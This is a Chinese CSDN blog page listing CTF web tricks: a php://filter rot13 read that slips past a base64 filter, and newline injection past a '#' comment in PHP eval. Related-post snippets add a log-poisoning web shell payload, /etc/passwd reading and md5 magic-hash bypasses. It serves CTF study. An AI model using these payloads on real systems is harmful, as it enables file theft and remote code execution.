CTF中tricks集合

已于 2022-10-11 11:19:31 修改
阅读量395 收藏
点赞数
分类专栏: 安全基础知识学习 文章标签: php 开发语言
于 2022-09-26 23:50:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Little_jcak/article/details/127063312
版权

1、过滤base,文件包含

这种情况很可能是禁止用伪协议中的base64编码,如下例子

php://filter/read=convert.base64-encode/resource=index.php

这种情况下可以采取其他的编码方式进行读取

php://filter/read=string.rot13/resource=flag.php

协议流官方文档参考

rot13解密工具

2、绕过#注释符

eval("#".$cmd);

通过换行来绕过

\r  => %0d
\n  => %0a
\r\n
Y3pro
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一些CTF 做题的tricks
qq_36495104的博客
07-01 2633
一些CTF 做题的tricks,东拼西凑放到这里,方便查找 任意文件读取路径汇总 任意文件读取漏洞和文件包含漏洞的表现相似,但是任意文件读取不能getshell,可以通过尝试读取相对路径的脚本文件,比如/read.php?file=index.php,如果可以读取到文件源码,说明是文件读取,如果不能读取到文件源码说明是文件包含。 下面收集的是一些常用的利用路径,应该够用了,以后也会及时更新,放在这便于以后的查阅和参考: 需要高权限读取的: 用户信息文件 /etc/passwd # 用来
网络安全CTF比赛工具集(整合版)
01-04
涵盖在线工具以及其他好用的工具包, 在线工具:导航型站点,CTF集合CTF工具包:包里有CTF相关的各种工具,包括逆向,解密,WEB,密码学等等,相当有用,可以方便地准备各种CTF比赛
CTF TricksPHP-妙用/proc/self/fd触发LFI日志包含完成RCE命令执行([羊城杯 2021]Only 4非预期解)
Ho1aAs‘s Blog
09-12 1660
文章目录前言利用原理参考完 前言 此Trick的使用面非常窄,只适用于特定环境,这里只做特例分析,在后续服务器复现,fd目录下没有指向日志的文件描述符,若有错误请指出 利用 ?gwht=/proc/self/fd/8&cmd=system('cat /flag'); 'user-agent': '<?php eval($_GET[cmd]);?>' /proc/self/fd/x -> /var/log/nginx/access.log include("/proc/self/
浅谈CTF各种花式绕过的小trick
ph0ebus的博客
02-23 4541
在代码审计的时候,我们不难发现很多很多的函数需要我们bypass,这些知识点很多又很小,基本上是一眼就明白,但是下一次遇见又不太清晰,需要反反复复查找,这篇文章浅浅做个汇总,如有不足,欢迎补充。
CTFphp相关考点
meteox的博客
08-07 2425
以前在做CTF题的时候总是会遇到一些用php的trick才能过的题,知识点还是很杂的,主要是php这种动态弱类型语言实在是太灵活,各种奇葩写法也多,把之前的知识总结下。 学长的博客有对php黑魔法进行了一些总结,我在此基础上进行拓展 https://skysec.top/2017/07/22/PHP%E5%87%BD%E6%95%B0%E9%BB%91%E9%AD%94%E6%B3%95%E5%B0%8F%E6%80%BB%E7%BB%93/#%E9%BB%91%E9%AD%94%E6%B3%95%E5%A
CTF/CTF练习平台-本地包含【eval函数闭合及代码段的理解】
热门推荐
Sp4rkW的博客
08-21 4万+
原题内容: 地址:http://120.24.86.145:8003/ 怎么说呢,难其实也不难,还是基本知识点掌握不足吧,写个wp记录下自己学习到的知识点 &lt;?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(_...
CTF技巧集合 tricks
10-23
标题的“CTF技巧集合 tricks”指的是Capture The Flag(CTF比赛的技巧和方法的集合CTF是一种信息安全竞赛,通常包含多种挑战,涉及计算机安全领域的各个方面。这场比赛能够帮助参与者快速学习并积累安全知识...
ctf-tools:CTF工具集合
02-04
ctf-tools:CTF工具集合
CTF网络安全大赛工具包集合
12-21
针对网络安全大赛的部分方向所需要的工具的集合
ctf-tools:白帽使用的有用的CTF工具的集合
05-17
白帽CTF工具集 入门 先决条件 git clone git@github.... 如果在Unix环境运行: ./aptInstall.sh 如果在装有macOS上运行: ./brewInstall.sh 添加新的CTF工具: git submodule add git@github.com:[REPO_URL]
补天教程.chm
06-27
补天教程.chm补天教程.chm补天教程.chm
ctf_writeups:CTF编写的集合
04-05
CTF撰写 我偶尔会为我发现有趣/有趣的CTF挑战发布文章。
ctf php侧漏,CTFPHP漏洞常见考点总结
weixin_31185473的博客
04-01 471
系统变量$_POST // 获取 post 数据,是一个字典$_GET // 获取 get 数据,是一个字典$_COOKIE // 获取 cookie$_SESSION // 获取 session$_FILE // 获取上传的文件$_REQUEST // 获取 $_GET,$_POST,$_COOKIE 的数据错误控制运算符PHP 支持一个错误控制运算符:@。当将其放置在一个PHP 表达式之前,...
ctf php侧漏,ctf常见的PHP漏洞小结
weixin_39588252的博客
04-01 1449
ctf常见的PHP漏洞小结在做ctf题的时候经常会遇到一些PHP代码审计的题目,这里将我遇到过的常见漏洞做一个小结。md5()漏洞PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。常见的payload有QNKCDZO24061070...
ctf Wiener tricky
dibanfu3470的博客
03-27 232
这题题目是wienerTricky,这是维纳滤波?? 没学过,,懵x 给了publickey,于是想先找出n,e 然后求出d 然后,真是为难我的小电脑了,yafu拆解,一开始几分钟,然后,20分钟,然后2个半小时, 这些我都让他跑完了!! 然后给我显示20小时。。。 断了yafu 老老实实看那个代码 https://github.com/pablocelay...
2020全国信息安全大赛 web之trick
Firebasky的博客
08-22 766
参加了国赛,才发现自己太菜了,自己做的时候不会 一看别人wp,cm!。正所谓赛后诸葛亮,今天自己也来总结一下这道题 上源代码 <?php class trick{ public $a; public $b; public function __destruct(){ $this->a = (string)$this->a; if(strlen($this->a) > 5 || strlen($this->b) &.
CTF常见的PHP函数漏洞
渗透、攻防、CTF、编程
07-04 2556
1.弱类型比较 2.MD5 compare漏洞 PHP在处理哈希字符串时,如果利用”!=”或”==”来对哈希值进行比较,它把每一个以”0x”开头的哈希值都解释为科学计数法0的多少次方(为0),所以如果两个不同的密码经过哈希以后,其哈希值都是以”0e”开头的,那么php将会认为他们相同。 常见的payload有 0x01 md5(str) QNKCDZO 240610708 s878926199a s155964671a s214587387a...
攻防世界CTF —— PHP本地文件包含漏洞解题思路
weixin_47610939的博客
07-27 4168
攻防世界的CTF web类题目,关于php本地文件包含漏洞的解题思路
PHP trick(代码审计关注点)
3569
03-29 703
https://hacksec.xyz/2018/03/23/php-trick/?nsukey=cWDNgiIxMsJayPNWtqM8Rc9amSOIgC0SI9Ko3jxxW2uV9mcoLNLdl4Q1U%2BrV9UhKIs3das0Cizzc8atumDKxG5nHSDPPthMpgeq5Xqa02MDie21AnddLn9BUUyOdXVEOsbvHRrlq1S61OS4%2BRpR...
CTFpwn的知识
最新发布
08-29
CTF(Capture The Flag)是一种网络安全竞赛活动,其PWN(Payload Writing and Exploitation)环节通常涉及到黑客技术的漏洞利用和本地权限提升。在PWN,选手需要找出程序的安全漏洞,比如缓冲区溢出、整数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值